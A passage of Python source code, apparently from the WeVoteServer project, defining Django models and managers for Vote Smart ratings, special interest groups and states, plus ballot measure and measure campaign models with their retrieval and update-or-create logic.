}
return one_official_filtered
class VoteSmartRatingManager(models.Model):
def __unicode__(self):
return "VoteSmartRatingManager"
# def retrieve_candidate_from_vote_smart_id(self, vote_smart_candidate_id):
# return self.retrieve_vote_smart_candidate(vote_smart_candidate_id)
#
# def retrieve_vote_smart_candidate_from_we_vote_id(self, we_vote_id):
# vote_smart_candidate_id = 0
# vote_smart_candidate_manager = VoteSmartCandidateManager()
# return vote_smart_candidate_manager.retrieve_vote_smart_candidate(vote_smart_candidate_id, we_vote_id)
#
# def fetch_vote_smart_candidate_id_from_we_vote_id(self, we_vote_id):
# vote_smart_candidate_id = 0
# vote_smart_candidate_manager = VoteSmartCandidateManager()
# results = vote_smart_candidate_manager.retrieve_vote_smart_candidate(vote_smart_candidate_id, we_vote_id)
# if results['success']:
# return results['vote_smart_candidate_id']
# return 0
#
# def retrieve_vote_smart_candidate_from_we_vote_local_id(self, local_candidate_id):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# vote_smart_candidate_manager = VoteSmartCandidateManager()
# return vote_smart_candidate_manager.retrieve_vote_smart_candidate(
# vote_smart_candidate_id, we_vote_id, candidate_maplight_id)
#
# def retrieve_vote_smart_candidate_from_full_name(self, candidate_name, state_code=None):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# candidate_maplight_id = ''
# vote_smart_candidate_manager = VoteSmartCandidateManager()
#
# results = vote_smart_candidate_manager.retrieve_vote_smart_candidate(
# vote_smart_candidate_id, first_name, last_name, state_code)
# return results
#
# def retrieve_vote_smart_candidate_from_name_components(self, first_name=None, last_name=None, state_code=None):
# vote_smart_candidate_id = 0
# vote_smart_candidate_manager = VoteSmartCandidateManager()
#
# results = vote_smart_candidate_manager.retrieve_vote_smart_candidate(
# vote_smart_candidate_id, first_name, last_name, state_code)
# return results
#
# # NOTE: searching by all other variables seems to return a list of objects
# def retrieve_vote_smart_candidate(
# self, vote_smart_candidate_id=None, first_name=None, last_name=None, state_code=None):
# """
# We want to return one and only one candidate
# :param vote_smart_candidate_id:
# :param first_name:
# :param last_name:
# :param state_code:
# :return:
# """
# error_result = False
# exception_does_not_exist = False
# exception_multiple_object_returned = False
# vote_smart_candidate = VoteSmartCandidate()
#
# try:
# if positive_value_exists(vote_smart_candidate_id):
# vote_smart_candidate = VoteSmartCandidate.objects.get(candidateId=vote_smart_candidate_id)
# vote_smart_candidate_id = convert_to_int(vote_smart_candidate.candidateId)
# status = "RETRIEVE_VOTE_SMART_CANDIDATE_FOUND_BY_ID"
# elif positive_value_exists(first_name) or positive_value_exists(last_name):
# candidate_queryset = VoteSmartCandidate.objects.all()
# if positive_value_exists(first_name):
# first_name = first_name.replace("`", "'") # Vote Smart doesn't like this kind of apostrophe: `
# candidate_queryset = candidate_queryset.filter(Q(firstName__istartswith=first_name) |
# Q(nickName__istartswith=first_name) |
# Q(preferredName__istartswith=first_name))
# if positive_value_exists(last_name):
# last_name = last_name.replace("`", "'") # Vote Smart doesn't like this kind of apostrophe: `
# candidate_queryset = candidate_queryset.filter(lastName__iexact=last_name)
# if positive_value_exists(state_code):
# candidate_queryset = candidate_queryset.filter(Q(electionStateId__iexact=state_code) |
# Q(electionStateId__iexact="NA"))
# vote_smart_candidate_list = list(candidate_queryset[:1])
# if vote_smart_candidate_list:
# vote_smart_candidate = vote_smart_candidate_list[0]
# else:
# vote_smart_candidate = VoteSmartCandidate()
# vote_smart_candidate_id = convert_to_int(vote_smart_candidate.candidateId)
# status = "RETRIEVE_VOTE_SMART_CANDIDATE_FOUND_BY_NAME"
# else:
# status = "RETRIEVE_VOTE_SMART_CANDIDATE_SEARCH_INDEX_MISSING"
# except VoteSmartCandidate.MultipleObjectsReturned as e:
# exception_multiple_object_returned = True
# status = "RETRIEVE_VOTE_SMART_CANDIDATE_MULTIPLE_OBJECTS_RETURNED"
# except VoteSmartCandidate.DoesNotExist:
# exception_does_not_exist = True
# status = "RETRIEVE_VOTE_SMART_CANDIDATE_NOT_FOUND"
#
# results = {
# 'success': True if positive_value_exists(vote_smart_candidate_id) else False,
# 'status': status,
# 'error_result': error_result,
# 'DoesNotExist': exception_does_not_exist,
# 'MultipleObjectsReturned': exception_multiple_object_returned,
# 'vote_smart_candidate_found': True if positive_value_exists(vote_smart_candidate_id) else False,
# 'vote_smart_candidate_id': vote_smart_candidate_id,
# 'vote_smart_candidate': vote_smart_candidate,
# }
# return results
class VoteSmartCategory(models.Model):
"""http://api.votesmart.org/docs/Rating.html
"""
categoryId = models.CharField(max_length=15, primary_key=True)
name = models.CharField(max_length=255)
def vote_smart_category_filter(category):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param category:
:return:
"""
category_filtered = {
'categoryId': category.categoryId,
'name': category.name,
}
return category_filtered
class VoteSmartRating(models.Model):
"""
http://api.votesmart.org/docs/Rating.html
A Vote Smart rating is like a voter guide, because it contains a package of candidateId/rating pairs like this:
{'candidateRating': [{'candidateId': '53279', 'rating': '40'},
{'candidateId': '53266', 'rating': '90'},
"""
ratingId = models.CharField(max_length=15, primary_key=True)
sigId = models.CharField(verbose_name="special interest group id", max_length=15)
timeSpan = models.CharField(max_length=255)
ratingName = models.CharField(max_length=255)
ratingText = models.TextField()
# This is the filter used for the Vote Smart call: Rating.getCandidateRating
# http://api.votesmart.org/docs/Rating.html
def vote_smart_candidate_rating_filter(rating):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param rating:
:return:
"""
rating_filtered = {
'ratingId': rating.ratingId,
'rating': rating.rating,
'timeSpan': rating.timespan, # Seems to be typo with lower case "s"
'ratingName': rating.ratingName,
'ratingText': rating.ratingText,
'sigId': rating.sigId,
}
return rating_filtered
# This is the filter used for the Vote Smart call: Rating.getSigRatings
# http://api.votesmart.org/docs/Rating.html
def vote_smart_rating_list_filter(rating):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param rating:
:return:
"""
rating_filtered = {
'ratingId': rating.ratingId,
'timeSpan': rating.timespan, # Seems to be typo with lower case "s"
'ratingName': rating.ratingName,
'ratingText': rating.ratingText,
}
return rating_filtered
class VoteSmartRatingOneCandidate(models.Model):
"""
http://api.votesmart.org/docs/Rating.html
A Vote Smart rating is like a voter guide, because it contains a package of candidateId/rating pairs like this:
{'candidateRating': [{'candidateId': '53279', 'rating': '40'},
{'candidateId': '53266', 'rating': '90'},
"""
ratingId = models.CharField(max_length=15)
sigId = models.CharField(verbose_name="special interest group id", max_length=15)
candidateId = models.CharField(max_length=15)
timeSpan = models.CharField(max_length=255)
rating = models.CharField(max_length=255)
ratingName = models.CharField(max_length=255)
ratingText = models.TextField()
def vote_smart_rating_one_candidate_filter(rating_one_candidate):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param rating:
:return:
"""
rating_one_candidate_filtered = {
'candidateId': rating_one_candidate.candidateId,
'rating': rating_one_candidate.rating,
}
return rating_one_candidate_filtered
class VoteSmartRatingCategoryLink(models.Model):
"""http://api.votesmart.org/docs/Rating.html
"""
ratingId = models.CharField(max_length=15)
sigId = models.CharField(verbose_name="group id for this rating", max_length=15)
candidateId = models.CharField(verbose_name="vote smart candidate id for this rating", max_length=15)
timeSpan = models.CharField(max_length=255)
categoryId = models.CharField(verbose_name="category id for this rating", max_length=15)
categoryName = models.CharField(verbose_name="category name", max_length=255)
class VoteSmartSpecialInterestGroup(models.Model):
"""http://api.votesmart.org/docs/Rating.html
"""
sigId = models.CharField(verbose_name="special interest group id", max_length=15, primary_key=True)
parentId = models.CharField(max_length=15)
stateId = models.CharField(max_length=2)
name = models.CharField(verbose_name="name of special interest group", max_length=255)
description = models.TextField()
address = models.CharField(max_length=255)
city = models.CharField(max_length=255)
state = models.CharField(max_length=255)
zip = models.CharField(max_length=255)
phone1 = models.CharField(max_length=255)
phone2 = models.CharField(max_length=255)
fax = models.CharField(max_length=255)
email = models.CharField(max_length=255)
url = models.CharField(max_length=255)
contactName = models.CharField(max_length=255)
def vote_smart_special_interest_group_list_filter(special_interest_group_from_list):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param special_interest_group:
:return:
"""
special_interest_group_list_filtered = {
'sigId': special_interest_group_from_list.sigId,
'parentId': special_interest_group_from_list.parentId,
'name': special_interest_group_from_list.name,
}
return special_interest_group_list_filtered
def vote_smart_special_interest_group_filter(special_interest_group):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param special_interest_group:
:return:
"""
special_interest_group_filtered = {
'sigId': special_interest_group.sigId,
'parentId': special_interest_group.parentId,
'stateId': special_interest_group.stateId,
'name': special_interest_group.name,
'description': special_interest_group.description,
'address': special_interest_group.address,
'city': special_interest_group.city,
'state': special_interest_group.state,
'zip': special_interest_group.zip,
'phone1': special_interest_group.phone1,
'phone2': special_interest_group.phone2,
'fax': special_interest_group.fax,
'email': special_interest_group.email,
'url': special_interest_group.url,
'contactName': special_interest_group.contactName,
}
return special_interest_group_filtered
class VoteSmartSpecialInterestGroupManager(models.Model):
def __unicode__(self):
return "VoteSmartSpecialInterestGroupManager"
def update_or_create_we_vote_organization(self, vote_smart_special_interest_group_id):
# See if we can find an existing We Vote organization with vote_smart_special_interest_group_id
if not positive_value_exists(vote_smart_special_interest_group_id):
results = {
'success': False,
'status': "SPECIAL_INTEREST_GROUP_ID_MISSING",
'organization_found': False,
'organization_created': False,
'organization': Organization(),
}
return results
# Retrieve Special Interest Group from local cache db
try:
vote_smart_organization = VoteSmartSpecialInterestGroup.objects.get(
sigId=vote_smart_special_interest_group_id)
vote_smart_organization_found = True
except VoteSmartSpecialInterestGroup.MultipleObjectsReturned as e:
vote_smart_organization = VoteSmartSpecialInterestGroup()
vote_smart_organization_found = False
except VoteSmartSpecialInterestGroup.DoesNotExist as e:
vote_smart_organization = VoteSmartSpecialInterestGroup()
# An organization matching this Vote Smart ID wasn't found
vote_smart_organization_found = False
if not vote_smart_organization_found:
results = {
'success': False,
'status': "SPECIAL_INTEREST_GROUP_MISSING",
'organization_found': False,
'organization_created': False,
'organization': Organization(),
}
return results
we_vote_organization_manager = OrganizationManager()
organization_id = 0
organization_we_vote_id = None
we_vote_organization_found = False
we_vote_organization_created = False
we_vote_organization_updated = False
results = we_vote_organization_manager.retrieve_organization(organization_id, organization_we_vote_id,
vote_smart_special_interest_group_id)
if results['organization_found']:
success = True
status = "NOT UPDATING RIGHT NOW"
we_vote_organization_found = True
we_vote_organization = results['organization']
# Update existing organization entry if email or website is missing
try:
organization_email_updated = False
organization_website_updated = False
if not positive_value_exists(we_vote_organization.organization_email) and \
positive_value_exists(vote_smart_organization.email):
we_vote_organization.organization_email = vote_smart_organization.email
organization_email_updated = True
if not positive_value_exists(we_vote_organization.organization_website) and \
positive_value_exists(vote_smart_organization.url):
we_vote_organization.organization_website = vote_smart_organization.url
organization_website_updated = True
if positive_value_exists(organization_email_updated) or \
positive_value_exists(organization_website_updated):
we_vote_organization.save()
success = True
status = "UPDATE_ORGANIZATION_FROM_VOTE_SMART_SUCCESS"
we_vote_organization_updated = True
else:
success = True
status = "UPDATE_ORGANIZATION_FROM_VOTE_SMART_NOT_REQUIRED"
we_vote_organization_updated = False
except Exception as error_instance:
error_message = error_instance.args
status = "UPDATE_ORGANIZATION_FROM_VOTE_SMART_ID_FAILED: " \
"{error_message}".format(error_message=error_message)
success = False
we_vote_organization = Organization()
else:
# Create new organization, or find existing org via other fields
try:
defaults_from_vote_smart = {
'organization_name': vote_smart_organization.name,
'organization_address': vote_smart_organization.address,
'organization_city': vote_smart_organization.city,
'organization_state': vote_smart_organization.state,
'organization_zip': vote_smart_organization.zip,
'organization_phone1': vote_smart_organization.phone1,
'organization_phone2': vote_smart_organization.phone2,
'organization_fax': vote_smart_organization.fax,
'organization_email': vote_smart_organization.email,
'organization_website': vote_smart_organization.url,
'organization_contact_name': vote_smart_organization.contactName,
'organization_description': vote_smart_organization.description,
'state_served_code': vote_smart_organization.stateId,
'vote_smart_id': vote_smart_organization.sigId,
}
we_vote_organization, we_vote_organization_created = Organization.objects.update_or_create(
organization_name=vote_smart_organization.name,
# organization_website=vote_smart_organization.url,
# organization_email=vote_smart_organization.email,
defaults=defaults_from_vote_smart,
)
success = True
status = "UPDATE_OR_CREATE_ORGANIZATION_FROM_VOTE_SMART"
we_vote_organization_found = True
except Organization.MultipleObjectsReturned as e:
success = False
status = "UPDATE_OR_CREATE_ORGANIZATION_FROM_VOTE_SMART_MULTIPLE_FOUND"
we_vote_organization = Organization()
except Exception as error_instance:
error_message = error_instance.args
status = "UPDATE_OR_CREATE_ORGANIZATION_FROM_VOTE_SMART_FAILED: " \
"{error_message}".format(error_message=error_message)
success = False
we_vote_organization = Organization()
results = {
'success': success,
'status': status,
'organization_found': we_vote_organization_found,
'organization_created': we_vote_organization_created,
'organization_updated': we_vote_organization_updated,
'organization': we_vote_organization,
}
return results
class VoteSmartState(models.Model):
"""http://api.votesmart.org/docs/State.html
"""
stateId = models.CharField(max_length=2, primary_key=True)
name = models.CharField(max_length=50)
senators = models.CharField(max_length=255) # example: 0
billUrl = models.CharField(max_length=255) # example:
usCircuit = models.CharField(max_length=255) # example: Ninth
ltGov = models.CharField(max_length=255) # example: t
rollLower = models.CharField(max_length=255) # example: Roll no.
lowerLegis = models.CharField(max_length=255) # example: Assembly
voterReg = models.CharField(max_length=255) # example: <p style="orphans: 1;"><strong><span sty
flower = models.CharField(max_length=255) # example: Golden Poppy
area = models.CharField(max_length=255) # example: 158,693 sq mi
upperLegis = models.CharField(max_length=255) # example: Legislature
termLength = models.CharField(max_length=255) # example: 0
bicameral = models.CharField(max_length=255) # example: t
capital = models.CharField(max_length=255) # example: Sacramento
voteUrl = models.CharField(max_length=255) # example:
nickName = models.CharField(max_length=255) # example: The Golden State
bird = models.CharField(max_length=255) # example: California Valley Quail
highPoint = models.CharField(max_length=255) # example: Mt. Whitney, 14,491 ft
termLimit = models.CharField(max_length=255) # example: 0
lowPoint = models.CharField(max_length=255) # example: Death Valley, 282 ft below sea level.
primaryDate = models.CharField(max_length=255) # example:
stateType = models.CharField(max_length=255) # example: State
statehood = models.CharField(max_length=255) # example: Sept. 9, 1850 (31st state)
reps = models.CharField(max_length=255) # example: 0
motto = models.CharField(max_length=255) # example: Eureka [I Have Found It]
population = models.CharField(max_length=255) # example: 36,961,664 (2009 est.)
tree = models.CharField(max_length=255) # example:
generalDate = models.CharField(max_length=255) # example:
rollUpper = models.CharField(max_length=255) # example: Roll no.
largestCity = models.CharField(max_length=255) # example:
def vote_smart_state_filter(one_state):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param one_state:
:return:
"""
one_state_filtered = {
'stateId': one_state['stateId'],
'name': one_state['name'],
}
return one_state_filtered
# Methods.
def get_state(state_id):
"""Retrieve State from database."""
return VoteSmartState.objects.filter(stateId=state_id)
def get_states():
""""Retrieve all State objects from database."""
return VoteSmartState.objects.all()
```
#### File: WeVoteServer/measure/models.py
```python
from django.db import models
from django.db.models import Q
from exception.models import handle_exception, handle_record_found_more_than_one_exception
from wevote_settings.models import fetch_next_we_vote_id_last_contest_measure_integer, \
fetch_next_we_vote_id_last_measure_campaign_integer, fetch_site_unique_id_prefix
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, extract_state_from_ocd_division_id, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
# The measure that is on the ballot (equivalent to ContestOffice)
class ContestMeasure(models.Model):
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our data with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "meas", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_contest_measure_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, default=None, null=True, blank=True, unique=True)
maplight_id = models.CharField(verbose_name="maplight unique identifier",
max_length=255, null=True, blank=True, unique=False)
vote_smart_id = models.CharField(verbose_name="votesmart unique identifier",
max_length=200, null=True, blank=True, unique=False)
# The title of the measure (e.g. 'Proposition 42').
measure_title = models.CharField(verbose_name="measure title", max_length=255, null=False, blank=False)
# The measure's title as passed over by Google Civic. We save this so we can match to this measure even
# if we edit the measure's name locally.
google_civic_measure_title = models.CharField(verbose_name="measure name exactly as received from google civic",
max_length=255, null=True, blank=True)
# A brief description of the referendum. This field is only populated for contests of type 'Referendum'.
measure_subtitle = models.TextField(verbose_name="google civic referendum subtitle",
null=True, blank=True, default="")
# The text of the measure. This field is only populated for contests of type 'Referendum'.
measure_text = models.TextField(verbose_name="measure text", null=True, blank=False)
# A link to the referendum. This field is only populated for contests of type 'Referendum'.
measure_url = models.CharField(verbose_name="measure details url", max_length=255, null=True, blank=False)
# The unique ID of the election containing this contest. (Provided by Google Civic)
google_civic_election_id = models.CharField(
verbose_name="google civic election id", max_length=255, null=True, blank=True)
google_civic_election_id_new = models.PositiveIntegerField(
verbose_name="google civic election id new", default=0, null=False, blank=False)
ocd_division_id = models.CharField(verbose_name="ocd division id", max_length=255, null=True, blank=True)
# ballot_placement: We store ballot_placement in the BallotItem table instead because it is different for each voter
# If this is a partisan election, the name of the party it is for.
primary_party = models.CharField(verbose_name="primary party", max_length=255, null=True, blank=True)
# The name of the district.
district_name = models.CharField(verbose_name="district name", max_length=255, null=False, blank=False)
# The geographic scope of this district. If unspecified the district's geography is not known.
# One of: national, statewide, congressional, stateUpper, stateLower, countywide, judicial, schoolBoard,
# cityWide, township, countyCouncil, cityCouncil, ward, special
district_scope = models.CharField(verbose_name="district scope", max_length=255, null=False, blank=False)
# An identifier for this district, relative to its scope. For example, the 34th State Senate district
# would have id "34" and a scope of stateUpper.
district_id = models.CharField(verbose_name="google civic district id", max_length=255, null=True, blank=True)
# State code
state_code = models.CharField(verbose_name="state this measure affects", max_length=2, null=True, blank=True)
wikipedia_page_id = models.BigIntegerField(verbose_name="pageid", null=True, blank=True)
wikipedia_page_title = models.CharField(
verbose_name="Page title on Wikipedia", max_length=255, null=True, blank=True)
wikipedia_photo_url = models.URLField(verbose_name='url of wikipedia logo', blank=True, null=True)
ballotpedia_page_title = models.CharField(
verbose_name="Page title on Ballotpedia", max_length=255, null=True, blank=True)
ballotpedia_photo_url = models.URLField(verbose_name='url of ballotpedia logo', blank=True, null=True)
def get_measure_state(self):
if positive_value_exists(self.state_code):
return self.state_code
# Pull this from ocdDivisionId
ocd_division_id = self.ocd_division_id
return extract_state_from_ocd_division_id(ocd_division_id)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this data came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_contest_measure_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "meas" = tells us this is a unique id for a ContestMeasure
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}meas{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
super(ContestMeasure, self).save(*args, **kwargs)
# The campaign that is supporting this Measure. Equivalent to CandidateCampaign
class MeasureCampaign(models.Model):
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our data with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "meascam", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_measure_campaign_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, default=None, null=True, blank=True, unique=True)
# contest_measure link
# The internal We Vote id for the ContestMeasure that this campaign taking a stance on
contest_measure_id = models.CharField(verbose_name="contest_measure unique id",
max_length=255, null=False, blank=False)
# Is the campaign attempting to pass the measure, or stop it from passing?
SUPPORT = 'S'
NEUTRAL = 'N'
OPPOSE = 'O'
STANCE_CHOICES = (
(SUPPORT, 'Support'),
(NEUTRAL, 'Neutral'),
(OPPOSE, 'Oppose'),
)
stance = models.CharField("stance", max_length=1, choices=STANCE_CHOICES, default=NEUTRAL)
# The candidate's name.
candidate_name = models.CharField(verbose_name="candidate name", max_length=255, null=False, blank=False)
# The full name of the party the candidate is a member of.
party = models.CharField(verbose_name="party", max_length=255, null=True, blank=True)
# A URL for a photo of the candidate.
photo_url = models.CharField(verbose_name="photoUrl", max_length=255, null=True, blank=True)
# The unique ID of the election containing this contest. (Provided by Google Civic)
google_civic_election_id = models.CharField(verbose_name="google election id",
max_length=255, null=False, blank=False)
google_civic_election_id_new = models.PositiveIntegerField(
verbose_name="google election id", default=0, null=False, blank=False)
# The URL for the candidate's campaign web site.
url = models.URLField(verbose_name='website url of campaign', blank=True, null=True)
facebook_url = models.URLField(verbose_name='facebook url of campaign', blank=True, null=True)
twitter_url = models.URLField(verbose_name='twitter url of campaign', blank=True, null=True)
google_plus_url = models.URLField(verbose_name='google plus url of campaign', blank=True, null=True)
youtube_url = models.URLField(verbose_name='youtube url of campaign', blank=True, null=True)
# The email address for the candidate's campaign.
measure_email = models.CharField(verbose_name="measure email", max_length=255, null=True, blank=True)
# The voice phone number for the campaign office for this measure.
measure_phone = models.CharField(verbose_name="measure phone", max_length=255, null=True, blank=True)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this data came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_measure_campaign_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "meascam" = tells us this is a unique id for a MeasureCampaign
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}meascam{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
super(MeasureCampaign, self).save(*args, **kwargs)
class ContestMeasureManager(models.Model):
def __unicode__(self):
return "ContestMeasureManager"
def retrieve_contest_measure_from_id(self, contest_measure_id):
contest_measure_manager = ContestMeasureManager()
return contest_measure_manager.retrieve_contest_measure(contest_measure_id)
def retrieve_contest_measure_from_we_vote_id(self, contest_measure_we_vote_id):
contest_measure_id = 0
contest_measure_manager = ContestMeasureManager()
return contest_measure_manager.retrieve_contest_measure(contest_measure_id, contest_measure_we_vote_id)
def retrieve_contest_measure_from_maplight_id(self, maplight_id):
contest_measure_id = 0
contest_measure_we_vote_id = ''
contest_measure_manager = ContestMeasureManager()
return contest_measure_manager.retrieve_contest_measure(contest_measure_id, contest_measure_we_vote_id,
maplight_id)
def fetch_contest_measure_id_from_maplight_id(self, maplight_id):
contest_measure_id = 0
contest_measure_we_vote_id = ''
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure(
contest_measure_id, contest_measure_we_vote_id, maplight_id)
if results['success']:
return results['contest_measure_id']
return 0
def fetch_contest_measure_we_vote_id_from_id(self, contest_measure_id):
contest_measure_we_vote_id = ''
maplight_id = ''
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure(
contest_measure_id, contest_measure_we_vote_id, maplight_id)
if results['success']:
return results['contest_measure_we_vote_id']
return 0
def update_or_create_contest_measure(self, we_vote_id, google_civic_election_id, measure_title,
district_id, district_name, state_code,
update_contest_measure_values):
"""
Either update or create an office entry.
"""
exception_multiple_object_returned = False
new_measure_created = False
proceed_to_update_or_save = True
success = False
status = 'ENTERING update_or_create_contest_measure'
contest_measure_on_stage = ContestMeasure()
if positive_value_exists(we_vote_id):
# If here we are dealing with an existing measure
pass
else:
# If here, we are dealing with a measure that is new to We Vote
if not (district_id or district_name):
success = False
status = 'MISSING_DISTRICT_ID-MEASURE_UPDATE_OR_CREATE'
proceed_to_update_or_save = False
elif not state_code:
success = False
status = 'MISSING_STATE_CODE-MEASURE_UPDATE_OR_CREATE'
proceed_to_update_or_save = False
elif not measure_title:
success = False
status = 'MISSING_MEASURE_TITLE-MEASURE_UPDATE_OR_CREATE'
proceed_to_update_or_save = False
if not google_civic_election_id:
success = False
status = 'MISSING_GOOGLE_CIVIC_ELECTION_ID-MEASURE_UPDATE_OR_CREATE'
proceed_to_update_or_save = False
if proceed_to_update_or_save:
# We need to use one set of values when we are creating an entry, and another set of values when we
# are updating an entry
try:
# Use get_or_create with create_contest_measure_values. It will be more elegent and less prone
# to problems.
# if a contest_measure_on_stage is found, *then* update it with update_contest_measure_values
if positive_value_exists(we_vote_id):
contest_measure_on_stage, new_measure_created = ContestMeasure.objects.update_or_create(
google_civic_election_id__exact=google_civic_election_id,
we_vote_id__iexact=we_vote_id,
defaults=update_contest_measure_values)
else:
contest_measure_on_stage, new_measure_created = ContestMeasure.objects.update_or_create(
google_civic_election_id__exact=google_civic_election_id,
district_id__exact=district_id,
district_name__iexact=district_name, # Case doesn't matter
measure_title__iexact=measure_title, # Case doesn't matter
state_code__iexact=state_code, # Case doesn't matter
defaults=update_contest_measure_values)
success = True
status = 'CONTEST_MEASURE_SAVED'
except ContestMeasure.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
success = False
status = 'MULTIPLE_MATCHING_CONTEST_MEASURES_FOUND'
exception_multiple_object_returned = True
results = {
'success': success,
'status': status,
'MultipleObjectsReturned': exception_multiple_object_returned,
'new_measure_created': new_measure_created,
'contest_measure': contest_measure_on_stage,
'saved': new_measure_created,
'updated': True if success and not new_measure_created else False,
'not_processed': True if not success else False,
}
return results
# NOTE: searching by all other variables seems to return a list of objects
def retrieve_contest_measure(self, contest_measure_id, contest_measure_we_vote_id='', maplight_id=None):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
contest_measure_on_stage = ContestMeasure()
try:
if positive_value_exists(contest_measure_id):
contest_measure_on_stage = ContestMeasure.objects.get(id=contest_measure_id)
contest_measure_id = contest_measure_on_stage.id
contest_measure_we_vote_id = contest_measure_on_stage.we_vote_id
status = "RETRIEVE_MEASURE_FOUND_BY_ID"
elif positive_value_exists(contest_measure_we_vote_id):
contest_measure_on_stage = ContestMeasure.objects.get(we_vote_id=contest_measure_we_vote_id)
contest_measure_id = contest_measure_on_stage.id
contest_measure_we_vote_id = contest_measure_on_stage.we_vote_id
status = "RETRIEVE_MEASURE_FOUND_BY_WE_VOTE_ID"
elif positive_value_exists(maplight_id):
contest_measure_on_stage = ContestMeasure.objects.get(maplight_id=maplight_id)
contest_measure_id = contest_measure_on_stage.id
contest_measure_we_vote_id = contest_measure_on_stage.we_vote_id
status = "RETRIEVE_MEASURE_FOUND_BY_MAPLIGHT_ID"
else:
status = "RETRIEVE_MEASURE_SEARCH_INDEX_MISSING"
except ContestMeasure.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
exception_multiple_object_returned = True
status = "RETRIEVE_MEASURE_MULTIPLE_OBJECTS_RETURNED"
except ContestMeasure.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_MEASURE_NOT_FOUND"
results = {
'success': True if convert_to_int(contest_measure_id) > 0 else False,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'contest_measure_found': True if convert_to_int(contest_measure_id) > 0 else False,
'contest_measure_id': convert_to_int(contest_measure_id),
'contest_measure_we_vote_id': contest_measure_we_vote_id,
'contest_measure': contest_measure_on_stage,
}
return results
def fetch_contest_measure_id_from_we_vote_id(self, contest_measure_we_vote_id):
"""
Take in contest_measure_we_vote_id and return internal/local-to-this-database contest_measure_id
:param contest_measure_we_vote_id:
:return:
"""
contest_measure_id = 0
try:
if positive_value_exists(contest_measure_we_vote_id):
contest_measure_on_stage = ContestMeasure.objects.get(we_vote_id=contest_measure_we_vote_id)
contest_measure_id = contest_measure_on_stage.id
except ContestMeasure.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except ContestMeasure.DoesNotExist:
contest_measure_id = 0
return contest_measure_id
class ContestMeasureList(models.Model):
"""
This is a class to make it easy to retrieve lists of Measures
"""
def __unicode__(self):
return "ContestMeasureList"
def retrieve_all_measures_for_upcoming_election(self, google_civic_election_id=0,
return_list_of_objects=False):
measure_list_objects = []
measure_list_light = []
measure_list_found = False
try:
measure_queryset = ContestMeasure.objects.all()
if positive_value_exists(google_civic_election_id):
measure_queryset = measure_queryset.filter(google_civic_election_id=google_civic_election_id)
else:
# TODO Limit this search to upcoming_elections only
pass
# We never expect more than 300 measures for one election
measure_list_objects = measure_queryset[:300]
if len(measure_list_objects):
measure_list_found = True
status = 'MEASURES_RETRIEVED'
success = True
else:
status = 'NO_MEASURES_RETRIEVED'
success = True
except ContestMeasure.DoesNotExist:
# No measures found. Not a problem.
status = 'NO_MEASURES_FOUND_DoesNotExist'
measure_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_all_measures_for_upcoming_election ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
if measure_list_found:
for measure in measure_list_objects:
one_measure = {
'ballot_item_display_name': measure.measure_title,
'measure_we_vote_id': measure.we_vote_id,
'office_we_vote_id': '',
'candidate_we_vote_id': '',
}
measure_list_light.append(one_measure.copy())
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'measure_list_found': measure_list_found,
'measure_list_objects': measure_list_objects if return_list_of_objects else [],
'measure_list_light': measure_list_light,
}
return results
def retrieve_possible_duplicate_measures(self, measure_title, google_civic_election_id, measure_url, maplight_id,
vote_smart_id,
we_vote_id_from_master=''):
measure_list_objects = []
